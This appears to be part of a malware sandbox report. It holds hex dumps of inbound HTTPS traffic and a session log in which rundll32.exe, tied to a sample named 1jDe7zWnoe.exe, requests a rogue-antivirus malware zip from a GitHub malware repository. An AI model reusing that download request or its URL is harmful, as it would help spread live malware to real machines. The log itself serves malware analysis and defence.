                                                                                                                                                2022-09-29 12:49:37 UTC8877INData Raw: a2 4d 85 99 62 5a a4 c2 93 f4 45 38 6b cd 10 94 4b 43 9e 0c 7a 76 1a 85 40 b2 5a 1c 66 5e 40 ab ce 93 f2 fe 01 5c 53 18 6a c9 63 42 55 f1 e7 3d 5e b1 f8 ef 1d 11 8d 2a 6b 3d 8b bd ba 4c eb c1 fb b9 f8 16 13 10 b8 24 1a e3 ff 85 68 25 d9 77 06 13 4f 46 46 36 31 4f 39 45 2e d1 09 a9 f0 ff b8 8a bc 7a 13 fa 54 73 f2 77 98 94 e2 a3 ef 37 ec b8 6b 8b f7 08 7f 7d 58 06 fc 3c e0 46 85 67 be 3f 78 9d a7 07 a4 7d ea 6d dd 16 9d 32 ef f8 ee 60 eb 25 99 a1 b8 ad b3 87 8c 4e 71 0e a1 d0 7b b5 55 bb 53 3f ef e8 f4 99 d7 8c de bc e4 f1 5a 6b 58 28 eb 71 fc 36 da 97 ee 16 a7 e3 00 f6 96 ac 41 65 2f bf c2 c0 03 a8 5c 86 1f 3e e7 fb ac d6 65 85 a2 0f 25 f8 de a2 f5 f1 8b 33 29 13 92 26 99 cc b5 a3 31 2b 29 78 c4 22 a6 42 60 2f 5d 2f a0 17 1d 6e 1d 14 a1 b7 0f 78 39 fd 6a
                                                                                                                                                Data Ascii: MbZE8kKCzv@Zf^@\SjcBU=^*k=L$h%wOFF61O9E.zTsw7k}X<Fg?x}m2`%Nq{US?ZkX(q6Ae/\>e%3)&1+)x"B`/]/nx9j
                                                                                                                                                2022-09-29 12:49:37 UTC8893INData Raw: f4 19 b1 cc d5 20 4b 67 0e 51 fb dd 17 a1 e9 fc 5f 0f 19 97 c4 79 73 22 e4 20 7f 7e e7 a9 df 78 11 6f f3 ae 20 87 65 5f 26 00 4a 66 e1 c6 b8 08 64 ca 22 ca da 13 a6 c4 f0 b5 85 85 9a b2 1a 24 2d 60 0c ef 44 a6 ad c6 6f f1 c0 c5 42 31 5c 6e 74 4f 64 7d 84 4d b2 d4 28 df 0c 3c 41 b1 45 31 3f 76 58 f3 c4 5b 1a c1 81 74 8e 95 6b 5a fd a9 20 40 c9 70 ba c5 0d f9 d7 61 fb 08 5d 6d 6d ba da 70 76 2f cc 93 91 cb 72 53 fa ab e0 54 90 ad 3b 64 f7 a9 c7 bf a0 62 08 72 97 cf 00 3c 07 1a 5f b3 79 0a c1 15 6d c5 fa 73 73 fb ed bf a2 a2 9d 00 ff 47 1d a1 aa b2 d8 0e 09 21 96 a6 cd a6 8a 03 14 56 96 6d 18 ba ca 02 19 b5 e9 80 b0 b7 42 af f6 30 35 0d 72 d0 67 b2 69 3c 2f 03 e0 e3 4c b1 f1 05 27 50 ad 5b 93 50 f9 51 5d 82 39 cf 5c b2 84 33 7e 3e 87 09 55 6f 48 44 50 a6 b5
                                                                                                                                                Data Ascii: KgQ_ys" ~xo e_&Jfd"$-`DoB1\ntOd}M(<AE1?vX[tkZ @pa]mmpv/rST;dbr<_ymssG!VmB05rgi</L'P[PQ]9\3~>UoHDP
                                                                                                                                                2022-09-29 12:49:37 UTC8909INData Raw: 97 01 bf a1 49 24 40 c3 a8 db ed bc 61 49 9b 3e 10 2f b7 17 26 b9 fe c2 fa d9 89 a4 20 71 58 65 be 98 18 a8 23 9e 4e 3a 15 79 5e c3 4c 45 40 a5 f8 73 d3 98 ac cd b4 6e 23 f8 62 fb ba 3b 03 f0 b0 b1 3e c4 3c 9e 9d 84 30 0c 12 78 3a 83 bc d3 83 29 8e 45 73 a6 dd 85 49 9b 21 c1 92 a2 cd 4a 06 65 f2 72 b5 d8 0a 00 14 ca bc 72 e2 bc 0c 67 2a 30 fd 96 43 be 97 53 d7 0c a5 f9 34 63 78 0e 90 eb 68 26 33 c3 10 32 0e ca b9 6e 24 88 fa 8d 88 3b 98 3b 80 69 19 18 bf a1 df d8 37 07 a1 79 1d 32 cc 5f 19 77 8a 38 5c 2f e3 d4 5c b9 47 6c 30 71 9c 3d 4d f7 08 ae ed c9 16 1d 2c c2 fa 66 86 68 7d fe 40 16 79 98 39 d1 dc 92 c7 72 67 3c 37 57 71 45 15 8e a0 a9 83 0a 3a 39 98 5e c4 4b 6c 17 32 f2 f5 23 f1 43 63 bb 72 fe a2 28 4c b2 50 09 86 a6 cd c5 e2 ce 7f 70 ca eb fc 66 5a
                                                                                                                                                Data Ascii: I$@aI>/& qXe#N:y^LE@sn#b;><0x:)EsI!Jerrg*0CS4cxh&32n$;;i7y2_w8\/\Gl0q=M,fh}@y9rg<7WqE:9^Kl2#Ccr(LPpfZ
                                                                                                                                                2022-09-29 12:49:37 UTC8925INData Raw: d4 32 34 4c ef 37 f9 15 cf b4 df 70 42 8d d4 f2 c0 13 2f 59 b6 bb aa d9 0f 06 89 42 60 72 bc 5e c1 8f 9f 31 d5 cd ca 0b 4c 03 47 f7 12 ac 76 d9 de f1 6a 2e 19 89 e2 66 27 29 2d 5e c4 c4 19 ad 1c ed 90 41 a2 6c e6 15 86 ae a3 ba 36 47 a0 31 cb 19 b8 7a c0 41 85 79 cb 3d bc 97 ec 8f cb a8 2f 06 61 db 1e 89 24 55 1d 7a b3 55 4c ca 1a 56 25 8b a1 43 39 8f 78 cd a5 37 e3 55 26 72 6f 9a b8 d8 68 7d 47 47 ed 93 39 90 60 98 d2 04 7c 5c e8 27 cf d3 46 2f 41 93 aa 42 ba 55 c5 44 3a cc 75 b2 27 5f c2 c9 65 30 8c fd c8 5a 6e a0 ae 9c bc 25 11 6c 00 85 8b 70 de 15 58 0b c1 cb 3c 8f ad 3a 31 01 49 b7 8b 60 a3 0f 40 93 59 b8 db 88 4d 9c a2 2a c8 24 12 6f 3d c6 78 6d 40 bf 3c 13 6c 9c 28 1f e4 1d c0 b1 66 7f af 39 6c 83 c8 75 51 a9 64 19 cf b9 de c0 2a 50 ec bb 3d 9c c5
                                                                                                                                                Data Ascii: 24L7pB/YB`r^1LGvj.f')-^Al6G1zAy=/a$UzULV%C9x7U&roh}GG9`|\'F/ABUD:u'_e0Zn%lpX<:1I`@YM*$o=xm@<l(f9luQd*P=
                                                                                                                                                2022-09-29 12:49:37 UTC8941INData Raw: 27 99 ec 72 47 6a 1f 8a d5 35 91 31 b0 61 30 43 1e 59 5a 1f fe 36 bf fe da 76 b8 dc 1f 31 98 2b 7f fe df 79 72 b7 ca de 6c 41 53 d1 f5 69 49 77 b7 3c f9 74 76 e4 0e a6 30 d3 36 21 f6 5e 9a 5f 8d ed b5 b6 42 97 8f 8d 60 dd 8f d9 3b 7c 49 db 21 44 91 b8 bf 53 cd f0 03 38 9d a9 7b 2d d6 5b 34 52 fa 9b f2 37 ae 37 22 90 26 39 58 4f ad 8c 51 8a 76 01 59 28 1d 91 e1 3e 06 28 2c b2 ab f4 fb 19 dd 39 2b ad da 51 22 02 47 5a a9 f5 45 6b 86 b0 d1 32 7d 36 ce ec 69 07 39 22 39 86 20 ca 7d b8 9a 31 ac 0a da 48 4a be c3 0c 93 09 8a 72 c2 38 6d 55 48 34 01 15 a7 21 d1 0f 44 86 ed 2a 17 12 01 0d 82 48 ba d3 af aa fa bc ab 13 7c a0 87 d9 41 50 13 ef 8f 94 c3 81 91 05 d8 2e 9f 7e c7 2b 9b 7d c2 3f 02 a2 cb a7 d3 72 b2 b8 7c df 0d 20 45 5c 68 e7 31 5d 5c 86 3e dc 88 bc 22
                                                                                                                                                Data Ascii: 'rGj51a0CYZ6v1+yrlASiIw<tv06!^_B`;|I!DS8{-[4R77"&9XOQvY(>(,9+Q"GZEk2}6i9"9 }1HJr8mUH4!D*H|AP.~+}?r| E\h1]\>"
                                                                                                                                                2022-09-29 12:49:37 UTC8957INData Raw: 45 de 4e 8b c7 c6 03 43 6d cf 47 2b 00 73 f4 22 71 ca c4 3e 42 0f 82 85 01 fb 4f 0f ef d9 f0 12 d8 d7 0c 8a 32 6b af 29 e1 af 20 56 53 aa 69 63 ca 5a a5 e8 f9 d8 dc 59 a9 c9 a0 71 bd 90 50 c0 07 22 a6 d1 79 d1 ac d0 ed 23 e2 39 95 e7 16 cb 55 2e 66 f4 a8 fa a3 1f fe ec 73 3d 34 21 78 60 ef 26 00 7b dc 60 1a 82 f0 ba 9d 9e cc 0f e8 81 78 59 4b ed 0b bf 95 87 28 2f 7f 5e 40 89 ea 76 3d 38 0f bd 08 99 39 85 1f 42 bd fd 4a 1e 98 66 33 f2 9b 3d 18 a9 cb 89 01 b8 0e 6a 82 a2 56 17 ee 2a 18 36 b6 33 60 6c 0b 4d 66 ea 4b 06 f0 f9 a8 88 ec a4 c6 01 ae 6f 1d b9 01 c6 21 22 77 91 b5 88 b0 0a d0 dd c4 de c3 58 5e ab 26 d9 1d af c2 ad 74 47 05 b7 48 19 c3 b4 1b a0 db 57 82 a5 50 85 40 95 2b 01 f9 9e 7c 07 39 0b 41 55 29 a1 e0 91 67 43 d6 83 7b 45 ee d4 0c c3 c4 58 36
                                                                                                                                                Data Ascii: ENCmG+s"q>BO2k) VSicZYqP"y#9U.fs=4!x`&{`xYK(/^@v=89BJf3=jV*63`lMfKo!"wX^&tGHWP@+|9AU)gC{EX6
                                                                                                                                                2022-09-29 12:49:37 UTC8973INData Raw: 2d db e5 14 2c 3d 58 5f 0b 29 9a db 82 27 e6 e7 30 90 e9 71 64 b5 71 ac 5a 73 98 f5 aa e4 a5 8a 57 39 d8 aa e3 13 d1 07 c9 13 eb d5 91 bf 63 00 a7 bd 87 b6 cd 16 4e 8b fd 00 25 f1 c1 1d 65 03 ae 5d 99 5a 19 73 74 ae b8 6c 0b 7b 63 19 aa a4 9a a9 ae 26 a2 87 28 ae c8 45 95 62 0f a9 57 6b d0 6b bb 8e e8 25 b5 a6 9b 96 fe ba 54 f7 d9 e6 dc 2f bb 04 e7 0f fb 6f 78 ed 79 b5 7d b3 2b 86 47 d8 78 e1 3b dd 66 bc cd 60 0c b6 f2 93 32 87 83 d1 64 e9 2c 5b b7 c4 59 6b d7 5b a4 d3 dc f7 50 9f b4 12 56 b8 ad 76 f6 6e 81 db 72 fc 30 d3 4b 22 4a 3e f4 8d 04 ef bd 66 4e 80 d0 11 74 e5 f8 55 cb 7c 85 6b 81 d5 10 30 97 d8 c0 a6 5c f5 ce 4a 96 55 de 10 eb fa 01 36 fc 21 a6 65 28 da 72 ed 5f 33 f5 e4 6e c5 fc 7b 06 67 dc 11 b9 76 22 d2 e7 f5 e0 44 be 3f da 42 77 74 da 98 3e
                                                                                                                                                Data Ascii: -,=X_)'0qdqZsW9cN%e]Zstl{c&(EbWkk%T/oxy}+Gx;f`2d,[Yk[PVvnr0K"J>fNtU|k0\JU6!e(r_3n{gv"D?Bwt>
                                                                                                                                                2022-09-29 12:49:37 UTC8989INData Raw: c5 a7 24 fc 8e 4e 6b 32 9c 4b 62 9c df ec 9f 30 ee 96 f9 53 48 0d dd 32 31 ee 7a c2 23 4d 3c 04 43 01 39 37 1e f3 af 1d 62 97 df 98 ba 62 e0 da 2e a7 c6 01 10 a4 e9 ef 89 eb f3 95 33 bb 58 8d e2 78 d8 38 22 b0 9e c7 bb 58 5a 56 7c b0 69 f3 18 11 47 a6 28 f2 45 05 8f c8 22 56 bf 06 56 11 69 d0 5a e5 d9 26 51 5f ee e1 18 b5 84 5a fc f2 f2 8a 8e 82 74 94 ad 93 e5 17 96 81 da ff 80 9c 67 b1 21 25 a5 3b 63 c3 37 f4 e5 53 03 d2 e8 68 d2 18 56 dc 24 b2 84 7f 0c ec 3b 4d c7 c6 8d 09 16 34 4e 88 07 35 25 07 23 8c 91 8d 60 34 a2 9a d9 52 71 27 1f 6c b3 cb bc 87 34 60 74 cc ad e6 f2 70 b0 a6 86 28 9d 62 a2 d5 3e c6 d7 63 83 77 90 07 ef c1 7d 87 ca 9a 65 76 d1 c9 bc 35 72 1b f4 6b 71 08 b7 01 44 b5 38 df 46 cd 8e cc 9f 63 3e 41 87 e6 75 a1 67 47 93 44 8f f4 cb a1 7b
                                                                                                                                                Data Ascii: $Nk2Kb0SH21z#M<C97bb.3Xx8"XZV|iG(E"VViZ&Q_Ztg!%;c7ShV$;M4N5%#`4Rq'l4`tp(b>cw}ev5rkqD8Fc>AugGD{
                                                                                                                                                2022-09-29 12:49:37 UTC9005INData Raw: b4 df df d8 d8 43 05 48 21 12 f0 89 0f 56 a6 01 20 d0 9c 26 8d 08 d3 91 fa 1b 3c 3c 1f 49 95 58 42 d6 d5 e7 42 80 70 80 0e 05 95 fe c5 13 3b 7b 0e 40 c1 89 59 ef 38 28 15 2b 7d 08 6a e2 40 de ca 19 3a 21 dd cd f7 ce 76 a6 bd 0a 5b ce 64 d3 e2 cf 02 c0 3b f5 e4 f8 d1 f0 33 1b 20 e3 b6 50 e0 48 78 03 15 f3 a1 20 3d ea 83 04 dd c3 69 f8 68 87 77 91 da a2 9c 6a f0 91 b5 c9 45 f5 d8 56 02 59 95 8c cb f5 55 db 31 5a 01 41 01 3e a2 38 b7 48 8d af 40 b5 1d 61 1f 18 82 a6 4b 82 3c 73 a5 17 00 ab 45 c2 80 31 81 bf 92 77 6e 20 37 89 e8 c4 06 aa 09 81 d5 40 ed 01 17 20 5c 7b 10 f2 05 49 65 20 47 ac 93 cd ca cb 49 f7 7a 19 cb a5 00 93 bc 16 81 f3 32 38 4b 3b 9d e8 86 2f d6 90 87 5a db f5 02 b3 2b 05 fd 3a 42 c6 6b c3 e8 dc 40 64 42 c9 b4 c5 4a 5d 55 2b 03 2e c7 ce 2d
                                                                                                                                                Data Ascii: CH!V &<<IXBBp;{@Y8(+}j@:!v[d;3 PHx =ihwjEVYU1ZA>8H@aK<sE1wn 7@ \{Ie GIz28K;/Z+:Bk@dBJ]U+.-
                                                                                                                                                2022-09-29 12:49:37 UTC9021INData Raw: 42 87 27 da 70 ad 93 b4 bd 76 c2 ab 70 0c fa 41 6e dc 1e b2 0c 37 19 1b 3d ff 36 eb c9 a9 e7 37 4b d0 b8 cc ab 96 bd da 34 da 46 f3 9d bd ec e4 5c 93 dc ea e5 be 99 c8 e3 4c d8 58 b6 9d 7d f0 bd a3 b3 db 29 0f 16 8c 9c 94 3b f2 f2 28 bb 8f 59 06 e4 8a 75 3f d9 7d 0f a4 c0 f6 1f 70 91 33 e2 e6 c6 ac d0 be 72 eb f4 db 33 b9 f0 ea c2 a0 f7 b8 22 38 5a 57 a8 9f 1e 8b da a0 98 24 75 af a7 be eb 00 b8 ef c6 a7 e3 12 cd d1 45 1c 75 d2 37 24 c8 91 b3 e6 0b 54 ad 77 04 cf 3f be 10 13 b0 63 c5 cf 89 bf 1d c5 93 d4 d8 a8 dc b0 1d 21 30 17 ff 94 70 9b 07 29 a5 e8 9f e0 d0 70 e3 bc 5b 8d 9e ca 91 42 07 c7 16 09 f6 67 d7 0f 70 51 54 0e 15 e9 34 84 e8 cc d2 9e e1 14 38 65 ce 38 4a ff b3 e4 b5 8d 9c b9 f4 56 73 f3 2f 68 fc 52 32 54 35 b3 16 22 4b e3 13 8a 98 ac 93 47 b7
                                                                                                                                                Data Ascii: B'pvpAn7=67K4F\LX});(Yu?}p3r3"8ZW$uEu7$Tw?c!0p)p[BgpQT48e8JVs/hR2T5"KG
                                                                                                                                                2022-09-29 12:49:37 UTC9031INData Raw: 5e 49 02 5f 1a e5 99 f2 b5 36 2e f4 6c 6d 59 eb 38 ef 07 6a e9 0c 08 85 ea d7 e1 43 29 8f 4f 2a fc 07 7c 5d 55 eb 73 1f 5b 8b be b9 a5 12 78 e7 4b 7d 52 4f 4d ba 2c 15 b8 99 a5 99 48 ea 7a b1 54 d9 d1 ba 8d 27 2d b6 32 eb 27 b9 92 2b 15 85 53 6b 0a 7a 78 66 eb 65 d5 0f 1b 09 36 86 51 0b f3 21 39 34 5c cd d9 ab a5 41 e7 42 42 21 08 83 da 47 bf df de 5e 84 ae 41 ac 8a 45 6d 29 dc b0 5c 3b d8 f9 5a 16 d6 4d 74 55 f4 fa fa 38 a1 47 32 da 91 ee 83 88 ab 54 b6 fb fa 14 11 16 07 61 77 e5 e2 c6 60 d5 dd 3b 16 17 fc 06 b4 51 70 93 4f 78 13 c3 70 36 33 be 14 f7 0c 60 73 71 ed 3f 82 73 0d b0 99 0e f8 5e 4c 09 60 9b 22 37 45 73 9d 77 91 3f b2 cd 03 b3 cc f1 2f d4 de c3 5f dd cd ba d1 c2 b9 d6 23 97 ea f8 95 02 3d c3 15 db 3a 17 7a 97 2b 4b 5b 00 d1 11 e5 2c 70 a9 f1
                                                                                                                                                Data Ascii: ^I_6.lmY8jC)O*|]Us[xK}ROM,HzT'-2'+Skzxfe6Q!94\ABB!G^AEm)\;ZMtU8G2Taw`;QpOxp63`sq?s^L`"7Esw?/_#=:z+K[,p
                                                                                                                                                2022-09-29 12:49:37 UTC9047INData Raw: 60 6e 25 a8 e7 f4 80 36 ba 73 ee ed 92 b1 e9 d5 31 5e 12 77 c6 dd a5 d0 c1 e6 da e7 43 40 75 f3 3a 4b 46 4a fb 25 c6 d8 fe 1d 73 61 4c 77 e6 e6 4c a5 96 3c f8 cd 9d 15 83 3b b0 7c 40 fe ac bf b2 b2 49 44 d8 50 f6 48 54 5f bd 85 2b b5 47 bb 5f 63 e5 56 c6 5f 96 5d b3 99 3f bc 7d 0c 3b 63 67 bd 8a 41 15 17 08 0b e5 cc ec 09 ea 68 4d 14 22 ea 06 c2 55 12 9b 8a c0 f3 d0 57 f8 b8 8c 22 1f d2 08 05 97 9a 0f 3f 11 c5 c3 4c 16 a9 fc d2 90 f6 3c d6 a5 8a 8c ef 58 0b cd 7f 5f ac 13 78 36 79 ff d2 3c 5f d5 c5 42 71 71 a9 64 fa 09 ca 22 f3 da c1 06 b3 26 24 4c 47 1e 87 a9 ce ec 8a 28 77 52 4c 35 cf 6d 63 37 e7 40 68 70 35 d0 da 61 af a5 a0 4e ab c8 7c 88 04 9f 49 60 94 42 f2 bd a9 9f 0b 58 18 92 fd 42 cd 11 d2 78 9c da 15 f1 6e 0e 2e 65 7f a1 41 fd 26 21 c1 17 a8 14
                                                                                                                                                Data Ascii: `n%6s1^wC@u:KFJ%saLwL<;|@IDPHT_+G_cV_]?};cgAhM"UW"?L<X_x6y<_Bqqd"&$LG(wRL5mc7@hp5aN|I`BXBxn.eA&!
                                                                                                                                                2022-09-29 12:49:37 UTC9063INData Raw: 83 3a 78 40 58 97 0c bb 7e ae 6a 7b 79 3c 5b 93 0b c8 63 e2 83 b0 a4 25 b5 5a 1b be 4e b9 9f dc 9a ad ec 9e f6 11 ea 9a 13 29 fe c2 64 a4 ce e0 b8 ed 99 2d 4a a0 2b f1 95 ab 48 4d a4 a8 01 a9 04 50 73 3e f3 8f f2 c5 1e cf b8 ab 72 9c 66 8b f5 2d 35 f8 69 19 a7 41 b0 cf 93 93 ec 24 c7 be f0 81 f8 00 3b cc 29 9f eb 9a fa 22 f1 dd e8 17 a2 28 c4 a3 3c f5 06 98 13 97 5a db bd 42 34 14 eb 91 f5 ba 87 0e 16 50 7f 10 90 b2 a0 18 01 ee ba 4e 29 5e f3 8d 8c f6 33 c2 b1 4a 88 8b 5d e1 8f 89 a5 43 7f d4 aa f7 cd 0c ee fc 01 cb 0a bf 72 5a 25 b1 ba 06 17 c3 64 4c 2e 35 80 f0 ae fd a4 c3 19 c4 35 09 3d 9e f9 ec 4e 59 cf 8a 80 9b 76 84 a5 39 6f 81 7c 94 0c 87 d0 47 68 27 88 4b af 14 a3 9d 19 4b 09 1e de fa 2e b7 5b 9a e6 28 ba 4c cd 79 4a 22 d5 8a 60 70 1f 88 3d 48 eb
                                                                                                                                                Data Ascii: :x@X~j{y<[c%ZN)d-J+HMPs>rf-5iA$;)"(<ZB4PN)^3J]CrZ%dL.55=NYv9o|Gh'KK.[(LyJ"`p=H
                                                                                                                                                2022-09-29 12:49:37 UTC9079INData Raw: f9 85 d0 b4 04 a2 93 2e 56 83 26 2d ff 22 12 2c 04 f8 dc 5d fb 21 94 6a 10 4d 75 e7 7e c8 67 45 2e 50 ea ed 4b 15 f6 97 c6 6a 42 1f e4 aa 0c 40 00 36 31 a1 30 e1 23 c4 23 55 a6 56 a3 f9 8e 07 4b 1f 25 32 d2 e5 14 6e a7 a8 62 af 35 6f ee 64 43 aa 6b 71 17 19 57 bf d9 23 c5 c8 2c ef ad 6e ae e2 32 06 45 5a 72 f8 5c cf 8f 9c ab 5f ff 14 3d d7 e5 05 dc 40 cb 4d 8d 3b 98 4f 89 80 af 7c 63 64 42 d3 e2 78 77 16 f4 8c 22 b8 cc 89 ea 53 23 7a 80 2d 2f af c0 97 2d 21 d3 b7 69 93 11 90 74 ba 4b 32 da 49 d1 35 65 05 d9 3d 64 e0 11 eb c7 84 19 e7 59 11 1e 6f 5b c2 cc 78 ce 51 2a e0 f5 42 27 fe 8f 50 4a 4a 08 b9 d4 e1 87 95 a7 93 b3 01 ba 14 7f ac 89 69 36 9d 9b d2 4f 93 fd 8d b6 7b 27 cb 73 6f 46 31 10 c5 50 03 44 ce 44 9a a0 d0 75 91 32 a2 0c ea f7 de d5 de 0e 8e c3
                                                                                                                                                Data Ascii: .V&-",]!jMu~gE.PKjB@610##UVK%2nb5odCkqW#,n2EZr\_=@M;O|cdBxw"S#z-/-!itK2I5e=dYo[xQ*B'PJJi6O{'soF1PDDu2
                                                                                                                                                2022-09-29 12:49:37 UTC9095INData Raw: ce 3f bf 82 34 0a 8d 3c 10 4b 38 95 09 e1 ba 55 55 d1 79 06 a6 fd 42 06 92 0d 9f 9b 64 03 27 ab 71 06 19 d7 1e 16 13 d9 bd cc 16 78 a9 d5 59 5d 28 59 e1 55 be 90 27 40 89 e2 cf 9c 2a 01 6a 9c 13 6e dc 13 56 61 f3 ad ab f9 31 6e b3 b7 b4 3a bc 56 a5 fc cc 9c 02 43 56 c4 0c 4f 13 92 01 bd a4 58 70 7d 50 ca 93 45 b7 12 8c 36 6f 33 59 af 21 2a 3d 07 72 10 7d c1 be 82 01 35 18 9e 0f f1 ba 54 a2 7d ce cc 87 9e 78 a8 71 9c e5 0f c9 61 4e 8e 1d 34 fe da 55 9a 53 79 3e 72 b7 ed ec 2b 01 67 bb 0c ff ae d0 85 04 bc 3f f1 21 f7 3d 18 f1 14 fa 7a 62 b3 65 c5 32 2c 50 a8 53 1a a4 0b a5 58 8f 07 d5 0e 75 94 8f fb f7 0f aa 3a e6 8b fd 36 c6 0f 18 68 52 7d d9 f0 94 93 e7 14 5a 54 3a 45 c9 b3 77 b5 9e 38 75 d8 ff 58 40 04 c9 d0 85 5a 77 c9 33 40 80 d8 89 4a 06 b0 7c 76 23
                                                                                                                                                Data Ascii: ?4<K8UUyBd'qxY](YU'@*jnVa1n:VCVOXp}PE6o3Y!*=r}5T}xqaN4USy>r+g?!=zbe2,PSXu:6hR}ZT:Ew8uX@Zw3@J|v#
                                                                                                                                                2022-09-29 12:49:37 UTC9111INData Raw: 77 6a 66 59 19 24 81 55 f9 e7 e0 60 8a 24 50 9b c6 3b 29 3c ee 63 4b 1a 76 e2 ba 29 f8 e3 de 5d a0 39 5a ee 4a 0a 11 93 14 d1 d8 6b 27 b8 4f 0a 15 c2 ea a2 31 cc f9 65 c1 f1 b4 52 5c e2 04 03 fd 7a 16 aa 60 c8 57 20 56 bf 26 ee 3a 05 48 3d a5 ec 62 db eb 92 86 7b 98 be c9 00 ec 39 2b 19 d3 b1 43 7a e6 e1 fa 91 2b 70 2f 75 96 e8 b3 a0 dc e6 a6 e2 1b ea fb 2c 70 2a d7 31 52 26 4f 3b 0b 9d 05 bc 93 21 73 3d 66 4a 3b 7e 9b 38 fb f3 c3 ab 18 59 f9 e7 7f 3e ed 43 69 f1 88 b6 61 80 3c f2 2c 3c ac 44 d4 66 2e 57 dd 0b 52 81 3a 9e 23 b1 20 92 ad 6d 0f 6b 83 cc c0 b1 0a 83 42 45 8f 2e 9c c0 c5 28 10 2e 7b 53 0b 41 17 74 99 5c 42 80 af 8a 76 c7 eb b7 18 33 14 20 e9 3b ee 76 b5 43 c7 c4 87 5b 53 9b ad 6f fb 08 20 ab 98 aa e3 30 79 f0 65 39 69 9d 42 dc f4 a6 6a ac 3b
                                                                                                                                                Data Ascii: wjfY$U`$P;)<cKv)]9ZJk'O1eR\z`W V&:H=b{9+Cz+p/u,p*1R&O;!s=fJ;~8Y>Cia<,<Df.WR:# mkBE.(.{SAt\Bv3 ;vC[So 0ye9iBj;
                                                                                                                                                2022-09-29 12:49:37 UTC9127INData Raw: 59 9f fd b2 9d 34 08 14 f4 00 43 2e 97 21 39 d5 cf 95 ad 23 a3 c6 a8 1d cc a8 4e 31 ee 92 55 a8 6c 83 ce 2a 1d a4 5c e9 38 9f 0a 31 8c e6 f8 fd 4e f7 23 f2 09 3b a0 14 b9 9d 1c a8 59 33 67 41 76 32 f0 a9 fe 34 c6 f9 14 2e 1d 25 ea a3 d9 4a 73 74 e4 a6 02 1e 55 63 c8 ed c2 63 2d 13 ad a1 30 34 b0 b1 78 e9 be 17 e8 af 69 4a 16 d4 89 48 c0 37 a2 ca f7 26 88 ea 80 d6 0d 73 c2 30 00 c2 da 5f f1 8b 37 9b ed d0 00 42 ee 36 4a 79 97 38 ec df a3 a1 3b b2 91 c6 71 3a 8e 79 d6 3f f2 95 94 9f d5 1e 12 78 5e 89 35 52 24 88 f2 9f c3 48 a7 eb ab cb 38 2d eb a7 ba f4 9e 3d 1b 81 35 d3 cc a9 bd 21 36 61 96 ae c9 ec f2 73 ff 8e c1 a1 ef ee de a0 a7 ae 56 21 b2 1d 19 60 28 b8 4f f2 b5 0f fb 6d 2a 5f 4e 12 21 36 93 37 7d 36 15 74 62 38 45 52 8d ff 95 d7 c2 a8 45 c5 6a 9f 09
                                                                                                                                                Data Ascii: Y4C.!9#N1Ul*\81N#;Y3gAv24.%JstUcc-04xiJH7&s0_7B6Jy8;q:y?x^5R$H8-=5!6asV!`(Om*_N!67}6tb8EREj
                                                                                                                                                2022-09-29 12:49:37 UTC9143INData Raw: d1 dd fd fc 8d 61 7f 95 c8 d8 a2 0f a1 8c 3b 7e 2f cd af 0e 64 ff 93 d4 36 45 54 9d 72 7e aa ac f2 3e 51 a0 e3 25 dd e3 3b 9e 65 0e 71 66 79 73 2f 88 d9 70 e9 4d a8 54 c3 59 d0 34 29 ac 63 dc 05 f2 1c 5f bb 97 5e 2b 2e 8b 81 b4 b1 5f 58 eb d9 49 af 76 52 b5 b3 9b cc 54 8d 92 22 dc f4 93 dd 9d 00 82 85 66 31 28 2d 0e 0b c2 94 72 db 00 2c 3a ec 78 bf 9d c5 8a a8 1f ac 3f 38 8d d9 f6 69 d0 3e 65 c5 ea 28 fe f9 a5 e1 d7 e5 6e 5e fa 9b 22 77 b4 ab c0 47 de 9c 6d f6 80 19 9d ef cf 3a bd bb 7d 77 c8 b1 ea d0 14 69 fd 5c 53 fe 0c 12 e6 37 79 78 90 19 95 b2 2d 46 24 61 f5 58 0b de dd f6 32 4a ef dd c9 8c 9e 1d 9c 90 a6 8b 60 bd 37 7e a4 1a ad 27 7e 97 20 c1 d9 e6 9d aa b7 34 ab 7a 52 9e 72 70 8c 8e dc 9d 28 79 a9 83 30 bd 16 5f 62 51 b0 c6 a8 ba 0f 01 77 1f eb 2a
                                                                                                                                                Data Ascii: a;~/d6ETr~>Q%;eqfys/pMTY4)c_^+._XIvRT"f1(-r,:x?8i>e(n^"wGm:}wi\S7yx-F$aX2J`7~'~ 4zRrp(y0_bQw*
                                                                                                                                                2022-09-29 12:49:37 UTC9159INData Raw: 13 7d 8a f3 03 95 ed 1a db 34 09 e8 fd 3b e6 98 5a 70 c6 57 11 b6 33 13 21 8c 76 f2 c1 4f 12 57 0b 80 f1 c6 e3 6b 46 d9 05 ac 63 4d 52 35 8b eb 95 ba 3e 6a 20 54 e8 c3 5f 81 8d 6f 4a ce 21 0f 3a 29 6d 97 c9 29 f5 54 68 eb a9 e8 79 87 a7 d2 90 15 6f b1 f9 7e de 9c a4 89 14 12 05 fa ba fb c9 e8 33 f0 15 48 56 38 e1 76 0e c8 90 b7 5b e3 59 67 9d a3 79 ae 42 f6 e7 f3 7d 28 e2 35 2b c8 d4 45 7b d3 80 91 95 9c 1a 46 92 89 8e 7c 66 bc fd c9 9d 56 fe 27 56 50 62 74 7e 31 43 45 44 21 28 5a 03 a2 02 15 4d 64 fd 0c de 40 06 8e 7a 19 cd 4e 15 cc ae 56 05 a7 bf 0c 83 c6 0e d4 1d 88 74 25 ff ef c4 3f fe 3a fd 4a 43 cc 27 c7 ec 71 1e 41 39 3e 1c 2a 67 f6 2c 47 99 43 60 be 82 63 4d 81 fd ef 9d ae bf 52 88 21 58 0a ae d4 de 98 a8 54 0e 18 f0 f9 4c 12 2d 7f 6d b6 9f 1b d5
                                                                                                                                                Data Ascii: }4;ZpW3!vOWkFcMR5>j T_oJ!:)m)Thyo~3HV8v[YgyB}(5+E{F|fV'VPbt~1CED!(ZMd@zNVt%?:JC'qA9>*g,GC`cMR!XTL-m


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                64192.168.2.349749140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:40 UTC9160OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip HTTP/1.1
                                                                                                                                                Host: github.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                65140.82.121.4443192.168.2.349749C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:40 UTC9160INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
